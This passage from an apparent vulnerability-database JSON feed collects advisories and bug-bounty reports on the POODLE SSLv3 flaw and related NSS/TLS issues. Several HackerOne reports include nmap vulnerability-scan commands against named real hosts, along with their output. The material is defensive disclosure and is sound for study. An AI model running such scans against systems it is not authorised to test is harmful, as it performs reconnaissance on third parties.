1, "description": "The definite_length_decoder function in lib/util/quickder.c in Mozilla\nNetwork Security Services (NSS) does not ensure that the DER encoding of\nan ASN.1 length is properly formed, which allows remote attackers to\nconduct data-smuggling attacks by using a long byte sequence for an\nencoding, as demonstrated by the SEC_QuickDERDecodeItem function's\nimproper handling of an arbitrary-length encoding of 0x00.\n\nThis update also adds support for the TLS Fallback Signaling Cipher\nSuite Value (TLS_FALLBACK_SCSV) in NSS, which can be used to prevent\nprotocol downgrade attacks against applications which re-connect using a\nlower SSL/TLS protocol version when the initial connection indicating\nthe highest supported protocol version fails. This can prevent a\nforceful downgrade of the communication to SSL 3.0, mitigating\nCVE-2014-3566, also known as POODLE. SSL 3.0 support has also been\ndisabled by default in this Firefox and Thunderbird update, further\nmitigating POODLE.", "reporter": "Arch Linux", "published": "2014-12-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "nss: signature forgery", "type": "archlinux", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-1569"], "modified": "2014-12-16T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2014-December/000176.html", "id": "ASA-201412-18", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "kaspersky": [{"lastseen": "2019-01-14T08:07:22", "references": [], "description": "### *CVSS*:\n7.1\n\n### *Detect date*:\n07/18/2014\n\n### *Severity*:\nHigh\n\n### *Description*:\nAn obsolete version of OpenSSL was found in Tableau. By exploiting this vulnerability malicious users can cause denial of service, obtain sensitive information and bypass security. This vulnerability can be exploited remotely.\n\n### *Affected products*:\nTableau server 8.1. versions 8.1.12 and earlier \nTableau server 8.2. versions 8.2.4 and earlier\n\n### *Solution*:\nUpdate to latest version\n\n### *Original advisories*:\n[Tableau changelog](<http://www.tableausoftware.com/support/releases>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Tableau Server](<https://threats.kaspersky.com/en/product/Tableau-Server/>)\n\n### *CVE-IDS*:\n[CVE-2014-3566](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566>) \n[CVE-2014-3568](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568>) \n[CVE-2014-3513](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513>) \n[CVE-2014-3567](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567>)", "edition": 34, "reporter": "Kaspersky Lab", "published": "2014-07-18T00:00:00", "title": "\r KLA10359Vulnerability in Tableau ", "type": "kaspersky", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2019-01-04T00:00:00", "id": "KLA10359", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10359", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "cisco": [{"lastseen": "2017-09-26T15:33:22", "_object_types": ["robots.models.base.Bulletin", "robots.models.cisco.CiscoBulletin"], "references": ["http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle"], "description": "A padding oracle vulnerability in the SSLv3 protocol could allow an unauthenticated, remote attacker to decrypt subsets of the encrypted communication.\n\nThe vulnerability is due to to the fact that the integrity of the Cipher Block Chaining (CBC) block cipher padding cannot be fully verified when decrypting. An attacker could exploit this vulnerability by performing an active Man in the Middle (MITM) attack.\n\nOn October 14, 2014, a vulnerability was publicly announced in the Secure Sockets Layer version 3 (SSLv3) protocol when using a block cipher in Cipher Block Chaining (CBC) mode. SSLv3 is a cryptographic protocol designed to provide communication security, which has been superseded by Transport Layer Security (TLS) protocols. By exploiting this vulnerability, an attacker could decrypt a subset of the encrypted communication.\n\nThis advisory is available at the following link:\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle [\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle\"]", "reporter": "Cisco", "published": "2014-10-15T18:30:00", "type": "cisco", "title": "SSL Padding Oracle On Downgraded Legacy Encryption (POODLE) Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-3566"], "_object_type": "robots.models.cisco.CiscoBulletin", "modified": "2017-04-12T13:43:52", "id": "CISCO-SA-20141015-POODLE", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-09-26T15:33:49", "_object_types": ["robots.models.base.Bulletin", "robots.models.cisco.CiscoBulletin"], "references": ["http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20141211-CVE-2014-8730"], "description": "A vulnerability in certain implementations of the TLSv1 protocol could allow an unauthenticated, remote attacker to access sensitive information.\n\nThe vulnerability is due to improper block cipher padding implemented in TLSv1 when using Cipher Block Chaining (CBC) mode. An attacker could exploit the vulnerability to perform an \"oracle padding\" side channel attack on the cryptographic message. A successful exploit could allow the attacker to access sensitive information.\n\nConsult the bug release note for additional information about affected products and configurations.\n\nF5 Networks has confirmed the vulnerability in a security advisory and released software updates.\n\nAttacks exploiting this vulnerability are identified as Padding Oracle On Downgraded Legacy Encryption (POODLE) attacks, which could be used to disclose HTTP cookies or other HTTP authorization content that is being transmitted over an TLSv1.x secure session. This issue should not be confused with CVE-2014-3566, as described in Cisco Alert 36084[\"http://tools.cisco.com/security/center/viewAlert.x?alertId=36084\"].\n\nIt should be noted that oracle does not refer to the software company of the same name, but to a term used in cryptography.\n\nTo exploit the vulnerability, the attacker may require access to a trusted, internal network to perform man-in-the-middle attacks on a targeted system. This access requirement limits the likelihood of a successful exploit.", "reporter": "Cisco", "published": "2014-12-11T19:21:05", "type": "cisco", "title": "SSL-TLS Implementations Cipher Block Chaining Padding Information Disclosure Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "IOS", "version": "12.4T", "operator": "eq"}, {"name": "IOS", "version": "15.2T", "operator": "eq"}, {"name": "IOS", "version": "15.4T", "operator": "eq"}, {"name": "IOS", "version": "15.4M", "operator": "eq"}, {"name": "Cisco Adaptive Security Appliance (ASA) Software", "version": "any", "operator": "eq"}, {"name": "Cisco ASR 5000 Series Software", "version": "any", "operator": "eq"}], "cvelist": ["CVE-2014-3566", "CVE-2014-8730"], "_object_type": "robots.models.cisco.CiscoBulletin", "modified": "2015-09-30T14:00:09", "id": "CISCO-SA-20141211-CVE-2014-8730", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20141211-CVE-2014-8730", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:04", "references": [], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57.amzn1", "arch": "i686", "packageFilename": "nss-devel-3.16.2-7.57.amzn1.i686.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57.amzn1", "arch": "i686", "packageFilename": "nss-debuginfo-3.16.2-7.57.amzn1.i686.rpm", "packageName": "nss-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57.amzn1", "arch": "i686", "packageFilename": "nss-sysinit-3.16.2-7.57.amzn1.i686.rpm", "packageName": "nss-sysinit", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57.amzn1", "arch": "x86_64", "packageFilename": "nss-devel-3.16.2-7.57.amzn1.x86_64.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57.amzn1", "arch": "x86_64", "packageFilename": "nss-sysinit-3.16.2-7.57.amzn1.x86_64.rpm", "packageName": "nss-sysinit", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57.amzn1", "arch": "i686", "packageFilename": "nss-tools-3.16.2-7.57.amzn1.i686.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57.amzn1", "arch": "x86_64", "packageFilename": "nss-3.16.2-7.57.amzn1.x86_64.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57.amzn1", "arch": "x86_64", "packageFilename": "nss-debuginfo-3.16.2-7.57.amzn1.x86_64.rpm", "packageName": "nss-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57.amzn1", "arch": "i686", "packageFilename": "nss-pkcs11-devel-3.16.2-7.57.amzn1.i686.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57.amzn1", "arch": "src", "packageFilename": "nss-3.16.2-7.57.amzn1.src.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57.amzn1", "arch": "i686", "packageFilename": "nss-3.16.2-7.57.amzn1.i686.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57.amzn1", "arch": "x86_64", "packageFilename": "nss-tools-3.16.2-7.57.amzn1.x86_64.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "3.16.2-7.57.amzn1", "arch": "x86_64", "packageFilename": "nss-pkcs11-devel-3.16.2-7.57.amzn1.x86_64.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}], "description": "**Issue Overview:**\n\nA flaw was found in the way SSL 3.0 handled padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. This flaw allows a man-in-the-middle (MITM) attacker to decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.\n\n \n**Affected Packages:** \n\n\nnss\n\n \n**Issue Correction:** \nRun _yum update nss_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n nss-3.16.2-7.57.amzn1.i686 \n nss-sysinit-3.16.2-7.57.amzn1.i686 \n nss-devel-3.16.2-7.57.amzn1.i686 \n nss-tools-3.16.2-7.57.amzn1.i686 \n nss-debuginfo-3.16.2-7.57.amzn1.i686 \n nss-pkcs11-devel-3.16.2-7.57.amzn1.i686 \n \n src: \n nss-3.16.2-7.57.amzn1.src \n \n x86_64: \n nss-3.16.2-7.57.amzn1.x86_64 \n nss-tools-3.16.2-7.57.amzn1.x86_64 \n nss-debuginfo-3.16.2-7.57.amzn1.x86_64 \n nss-devel-3.16.2-7.57.amzn1.x86_64 \n nss-pkcs11-devel-3.16.2-7.57.amzn1.x86_64 \n nss-sysinit-3.16.2-7.57.amzn1.x86_64 \n \n \n", "edition": 1, "reporter": "Amazon", "published": "2014-10-16T22:21:00", "title": "Important: nss", "type": "amazon", "enchantments": {"score": {"modified": "2018-10-02T16:55:04", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2014-10-16T22:21:00", "id": "ALAS-2014-429", "href": "https://alas.aws.amazon.com/ALAS-2014-429.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-02T16:55:03", "references": [], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79.amzn1", "arch": "i686", "packageFilename": "openssl-debuginfo-1.0.1i-1.79.amzn1.i686.rpm", "packageName": "openssl-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79.amzn1", "arch": "i686", "packageFilename": "openssl-perl-1.0.1i-1.79.amzn1.i686.rpm", "packageName": "openssl-perl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79.amzn1", "arch": "i686", "packageFilename": "openssl-1.0.1i-1.79.amzn1.i686.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79.amzn1", "arch": "x86_64", "packageFilename": "openssl-1.0.1i-1.79.amzn1.x86_64.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79.amzn1", "arch": "x86_64", "packageFilename": "openssl-debuginfo-1.0.1i-1.79.amzn1.x86_64.rpm", "packageName": "openssl-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79.amzn1", "arch": "x86_64", "packageFilename": "openssl-static-1.0.1i-1.79.amzn1.x86_64.rpm", "packageName": "openssl-static", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79.amzn1", "arch": "x86_64", "packageFilename": "openssl-perl-1.0.1i-1.79.amzn1.x86_64.rpm", "packageName": "openssl-perl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79.amzn1", "arch": "i686", "packageFilename": "openssl-devel-1.0.1i-1.79.amzn1.i686.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79.amzn1", "arch": "x86_64", "packageFilename": "openssl-devel-1.0.1i-1.79.amzn1.x86_64.rpm", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79.amzn1", "arch": "src", "packageFilename": "openssl-1.0.1i-1.79.amzn1.src.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "1.0.1i-1.79.amzn1", "arch": "i686", "packageFilename": "openssl-static-1.0.1i-1.79.amzn1.i686.rpm", "packageName": "openssl-static", "operator": "lt"}], "description": "**Issue Overview:**\n\nBodo Moller, Thai Duong and Krzysztof Kotowicz of Google discovered a flaw in the design of SSL version 3.0 that would allow an attacker to calculate the plaintext of secure connections, allowing, for example, secure HTTP cookies to be stolen.\n\nhttp://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html \nhttps://www.openssl.org/~bodo/ssl-poodle.pdf\n\n \n\n\n#### Special notes:\n\nWe have backfilled our 2014.03, 2013.09, and 2013.03 Amazon Linux AMI repositories with updated openssl packages that fix [CVE-2014-3566 __](<https://access.redhat.com/security/cve/CVE-2014-3566>).\n\nFor 2014.09 Amazon Linux AMIs, _openssl-1.0.1i-1.79.amzn1_ addresses this CVE. Running _yum clean all_ followed by _yum update openssl_ will install the fixed package.\n\nFor Amazon Linux AMIs [\"locked\"](<https://aws.amazon.com/amazon-linux-ami/faqs/#lock>) to the 2014.03 repositories, _openssl-1.0.1i-1.79.amzn1_ also addresses this CVE. Running _yum clean all_ followed by _yum update openssl_ will install the fixed package.\n\nFor Amazon Linux AMIs [\"locked\"](<https://aws.amazon.com/amazon-linux-ami/faqs/#lock>) to the 2013.09 or 2013.03 repositories, _openssl-1.0.1e-4.60.amzn1_ addresses this CVE. Running _yum clean all_ followed by _yum update openssl_ will install the fixed package.\n\nIf you are using a pre-2013.03 Amazon Linux AMI, we encourage you to move to a newer version of the Amazon Linux AMI as soon as possible.\n\n \n**Affected Packages:** \n\n\nopenssl\n\n \n**Issue Correction:** \nRun _yum update openssl_ to update your system. Note that you may need to run _yum clean all_ first.\n\n \n\n\n**New Packages:**\n \n \n i686: \n openssl-1.0.1i-1.79.amzn1.i686 \n openssl-debuginfo-1.0.1i-1.79.amzn1.i686 \n openssl-perl-1.0.1i-1.79.amzn1.i686 \n openssl-devel-1.0.1i-1.79.amzn1.i686 \n openssl-static-1.0.1i-1.79.amzn1.i686 \n \n src: \n openssl-1.0.1i-1.79.amzn1.src \n \n x86_64: \n openssl-debuginfo-1.0.1i-1.79.amzn1.x86_64 \n openssl-static-1.0.1i-1.79.amzn1.x86_64 \n openssl-perl-1.0.1i-1.79.amzn1.x86_64 \n openssl-devel-1.0.1i-1.79.amzn1.x86_64 \n openssl-1.0.1i-1.79.amzn1.x86_64 \n \n \n", "edition": 1, "reporter": "Amazon", "published": "2014-10-14T23:34:00", "title": "Important: openssl", "type": "amazon", "enchantments": {"score": {"modified": "2018-10-02T16:55:03", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2014-10-14T23:34:00", "id": "ALAS-2014-426", "href": "https://alas.aws.amazon.com/ALAS-2014-426.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "hackerone": [{"lastseen": "2018-04-19T17:34:12", "references": [], "bounty": 280.0, "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/000/061/4acfe72859c5e9cb48a152edb4e498e13fa28df2_small.?1439954730", "medium": "https://profile-photos.hackerone-user-content.com/000/000/061/e78ef26a3191adcabe7311daa107bd9e152d3b5c_medium.?1439954730"}, "handle": "twitter", "url": "https://hackerone.com/twitter"}, "bountyState": "resolved", "description": "\n**Summary:** POODLE SSLv3 bug on multiple twitter smtp servers\n\n**Description:** CVE-2014-3566: The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the \"POODLE\" issue.\n\n\n## Steps To Reproduce:\n\nHi Twitter Sec team here is the POC\n\n 1. get a nmap installation and twitter_smtp_ssl_servers.txt file (attached) \n 2. run this command :\n\"nmap -sV --version-light -Pn --script ssl-poodle -p 25 -iL twitter_smtp_ssl_servers.txt | grep -B 5 VULNERABLE\"\n 3. See the results \n\n## Supporting Material/References:\n\n * An output screentshot and the twitter_smtp_ssl_servers.txt are attached.\n", "edition": 3, "reporter": "omespino", "published": "2017-11-09T21:44:16", "type": "hackerone", "title": "Twitter: POODLE SSLv3 bug on multiple twitter smtp servers (mx3.twitter.com,199.59.148.204,199.16.156.108 and 199.59.148.204)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "h1reporter": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/169/175/b95c1cd6fb801fdd32f67992784c2b4b497aa4d5_small.png?1521140844"}, "hacker_mediation": false, "disabled": false, "is_me?": false, "hackerone_triager": false, "url": "/omespino", "username": "omespino"}, "bulletinFamily": "bugbounty", "cvelist": ["CVE-2014-3566"], "modified": "2018-02-22T00:11:25", "href": "https://hackerone.com/reports/288966", "id": "H1:288966", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-24T03:22:19", "references": [], "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/017/011/4a259e2f731f105c784b1279db99215cefb8abbd_small.?1482361910", "medium": "https://profile-photos.hackerone-user-content.com/000/017/011/94822999c270d791d185b40e07d36cc864e96faa_medium.?1482361910"}, "handle": "newrelic", "url": "https://hackerone.com/newrelic"}, "bounty": 0.0, "bountyState": "resolved", "description": "Hi,\n\nI get in touch to report that cloud.newrelic.com is vulnerable to CVE-2014-3566 (POODLE). \n\nWebsites that support SSLv3 and CBC-mode ciphers are potentially vulnerable to an active MITM (Man-in-the-middle) attack. This attack, called POODLE, is similar to the BEAST attack and also allows a network attacker to extract the plaintext of targeted parts of an SSL connection, usually cookie data. Unlike the BEAST attack, it doesn't require such extensive control of the format of the plaintext and thus is more practical.\n\nThe impact of this vulnerability\n\tAn attacker may be able to exploit this problem to conduct man-in-the-middle attacks and decrypt communications between the affected service and clients.\n\nPoC:\n$ nmap -sV --version-light --script ssl-poodle -p 443 cloud.newrelic.com\nPORT STATE SERVICE REASON\n443/tcp open https syn-ack\n| ssl-poodle:\n| VULNERABLE:\n| SSL POODLE information leak\n\n$ nmap --script ssl-enum-ciphers -p 443 cloud.newrelic.com\n\nPORT STATE SERVICE\n443/tcp open https\n| ssl-enum-ciphers:\n| SSLv3:\n| ciphers:\n| TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A\n| TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A\n| TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C\n| compressors:\n| NULL\n| cipher preference: server\n| warnings:\n| 64-bit block cipher 3DES vulnerable to SWEET32 attack\n| CBC-mode cipher in SSLv3 (CVE-2014-3566)\n\nHow to fix this vulnerability\n\tIt's recommended to disable SSLv3 and replace it with TLSv1.0 as soon as compatibility with legacy clients is no longer required. (The only browser that does not support TLSv1.0 is Internet Explorer 6).\n\nTo disable SSLv2 and SSLv3: \n\tFor Nginx:\n\tssl_protocols TLSv1 TLSv1.1 TLSv1.2;\n\nReferences\n\thttps://security.googleblog.com/2014/10/this-poodle-bites-exploiting-ssl-30.html\n\nI look forward to hearing from you\n\nBest Regards", "edition": 3, "reporter": "guifre", "published": "2017-03-26T19:08:23", "title": "New Relic: SSL Padding Oracle On Downgraded Legacy Encryption (POODLE) Vulnerability", "type": "hackerone", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "h1reporter": {"profile_picture_urls": {"small": "/assets/avatars/default-71a302d706457f3d3a31eb30fa3e73e6cf0b1d677b8fa218eaeaffd67ae97918.png"}, "hacker_mediation": false, "disabled": false, "is_me?": false, "url": "/guifre", "hackerone_triager": false, "username": "guifre"}, "bulletinFamily": "bugbounty", "cvelist": ["CVE-2014-3566"], "modified": "2017-11-10T22:24:05", "href": "https://hackerone.com/reports/216271", "id": "H1:216271", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-19T17:34:09", "references": [], "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/015/966/de40911e781a8b85c3b253fa22f0119175ca91f2_small.png?1477497046", "medium": "https://profile-photos.hackerone-user-content.com/000/015/966/9b01ecc388e5d9d64b3b532dd5db41b02323e9dc_medium.png?1477497046"}, "handle": "semrush", "url": "https://hackerone.com/semrush"}, "bounty": 0.0, "bountyState": "not-applicable", "description": "**Summary:** \nPOODLE SSLv3 bug on multiple servers\n\n**Description:** \n CVE-2014-3566: The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the \"POODLE\" issue.\n\n## Steps To Reproduce:\n\n1. Create .txt file include this ip : ( 54.230.149.17 & 54.230.149.158 ) ex: ip.txt\n2. nmap -sV --version-light -Pn --script ssl-poodle -p 443 -iL ip.txt\n\n## Supporting Material/References:\n\n```\nroot@jancok:~# nmap -sV --version-light -Pn --script ssl-poodle -p 443 -iL ip.txt\n\nStarting Nmap 7.25BETA1 ( https://nmap.org ) at 2018-02-22 23:40 EST\nNmap scan report for server-54-230-149-17.sin2.r.cloudfront.net (54.230.149.17)\nHost is up (0.029s latency).\nPORT STATE SERVICE VERSION\n443/tcp open ssl/https?\n| ssl-poodle: \n| VULNERABLE:\n| SSL POODLE information leak\n| State: LIKELY VULNERABLE\n| IDs: OSVDB:113251 CVE:CVE-2014-3566\n| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and\n| other products, uses nondeterministic CBC padding, which makes it easier\n| for man-in-the-middle attackers to obtain cleartext data via a\n| padding-oracle attack, aka the \"POODLE\" issue.\n| Disclosure date: 2014-10-14\n| Check results:\n| TLS_RSA_WITH_AES_128_CBC_SHA\n| TLS_FALLBACK_SCSV properly implemented\n| References:\n| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n| https://www.imperialviolet.org/2014/10/14/poodle.html\n| https://www.openssl.org/~bodo/ssl-poodle.pdf\n|_ http://osvdb.org/113251\n1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :\nSF-Port443-TCP:V=7.25BETA1%T=SSL%I=2%D=2/22%Time=5A8F9B45%P=x86_64-pc-linu\nSF:x-gnu%r(GetRequest,36B,\"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nServer:\\x\nSF:20CloudFront\\r\\nDate:\\x20Thu,\\x2022\\x20Feb\\x202018\\x2016:40:40\\x20GMT\\r\nSF:\\nContent-Type:\\x20text/html\\r\\nContent-Length:\\x20551\\r\\nConnection:\\x\nSF:20close\\r\\nX-Cache:\\x20Error\\x20from\\x20cloudfront\\r\\nVia:\\x201\\.1\\x209\nSF:f6b01a312a31ea74b95b305e8d62497\\.cloudfront\\.net\\x20\\(CloudFront\\)\\r\\nX\nSF:-Amz-Cf-Id:\\x20wTZjtVmAWgTRJcBZoY1eKmML1MIGDjqyL8HHIbcopGOT3RptvM0oAw==\nSF:\\r\\n\\r\\n<!DOCTYPE\\x20HTML\\x20PUBLIC\\x20\\\"-//W3C//DTD\\x20HTML\\x204\\.01\\x\nSF:20Transitional//EN\\\"\\x20\\\"http://www\\.w3\\.org/TR/html4/loose\\.dtd\\\">\\n<\nSF:HTML><HEAD><META\\x20HTTP-EQUIV=\\\"Content-Type\\\"\\x20CONTENT=\\\"text/html;\nSF:\\x20charset=iso-8859-1\\\">\\n<TITLE>ERROR:\\x20The\\x20request\\x20could\\x20\nSF:not\\x20be\\x20satisfied</TITLE>\\n</HEAD><BODY>\\n<H1>ERROR</H1>\\n<H2>The\\\nSF:x20request\\x20could\\x20not\\x20be\\x20satisfied\\.</H2>\\n<HR\\x20noshade\\x2\nSF:0size=\\\"1px\\\">\\nBad\\x20request\\.\\n<BR\\x20clear=\\\"all\\\">\\n<HR\\x20noshade\nSF:\\x20size=\\\"1px\\\">\\n<PRE>\\nGenerated\\x20by\\x20cloudfront\\x20\\(CloudFront\nSF:\\)\\nRequest\\x20ID:\\x20wTZjtVmAWgTRJcBZoY1eKmML1MIGDjqyL8HHIbcopGOT3Rptv\nSF:M0oAw==\\n</PRE>\\n<ADDRESS>\\n</ADDRESS>\\n</BODY></HTML>\")%r(HTTPOptions,\nSF:36B,\"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nServer:\\x20CloudFront\\r\\nDat\nSF:e:\\x20Thu,\\x2022\\x20Feb\\x202018\\x2016:40:40\\x20GMT\\r\\nContent-Type:\\x20\nSF:text/html\\r\\nContent-Length:\\x20551\\r\\nConnection:\\x20close\\r\\nX-Cache:\nSF:\\x20Error\\x20from\\x20cloudfront\\r\\nVia:\\x201\\.1\\x20c811a11df2d0d24d49e3\nSF:cdf48257de21\\.cloudfront\\.net\\x20\\(CloudFront\\)\\r\\nX-Amz-Cf-Id:\\x20dUUs\nSF:gtWLhorBbOSJMk6AESCL5MYIhEXtXdoSrTQ5pa0vKwxzKOa_0Q==\\r\\n\\r\\n<!DOCTYPE\\x\nSF:20HTML\\x20PUBLIC\\x20\\\"-//W3C//DTD\\x20HTML\\x204\\.01\\x20Transitional//EN\\\nSF:\"\\x20\\\"http://www\\.w3\\.org/TR/html4/loose\\.dtd\\\">\\n<HTML><HEAD><META\\x2\nSF:0HTTP-EQUIV=\\\"Content-Type\\\"\\x20CONTENT=\\\"text/html;\\x20charset=iso-885\nSF:9-1\\\">\\n<TITLE>ERROR:\\x20The\\x20request\\x20could\\x20not\\x20be\\x20satisf\nSF:ied</TITLE>\\n</HEAD><BODY>\\n<H1>ERROR</H1>\\n<H2>The\\x20request\\x20could\nSF:\\x20not\\x20be\\x20satisfied\\.</H2>\\n<HR\\x20noshade\\x20size=\\\"1px\\\">\\nBad\nSF:\\x20request\\.\\n<BR\\x20clear=\\\"all\\\">\\n<HR\\x20noshade\\x20size=\\\"1px\\\">\\n\nSF:<PRE>\\nGenerated\\x20by\\x20cloudfront\\x20\\(CloudFront\\)\\nRequest\\x20ID:\\\nSF:x20dUUsgtWLhorBbOSJMk6AESCL5MYIhEXtXdoSrTQ5pa0vKwxzKOa_0Q==\\n</PRE>\\n<A\nSF:DDRESS>\\n</ADDRESS>\\n</BODY></HTML>\");\n\nNmap scan report for server-54-230-149-158.sin2.r.cloudfront.net (54.230.149.158)\nHost is up (0.028s latency).\nPORT STATE SERVICE VERSION\n443/tcp open ssl/https?\n| ssl-poodle: \n| VULNERABLE:\n| SSL POODLE information leak\n| State: LIKELY VULNERABLE\n| IDs: OSVDB:113251 CVE:CVE-2014-3566\n| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and\n| other products, uses nondeterministic CBC padding, which makes it easier\n| for man-in-the-middle attackers to obtain cleartext data via a\n| padding-oracle attack, aka the \"POODLE\" issue.\n| Disclosure date: 2014-10-14\n| Check results:\n| TLS_RSA_WITH_AES_128_CBC_SHA\n| TLS_FALLBACK_SCSV properly implemented\n| References:\n| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n| https://www.imperialviolet.org/2014/10/14/poodle.html\n| https://www.openssl.org/~bodo/ssl-poodle.pdf\n|_ http://osvdb.org/113251\n1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at 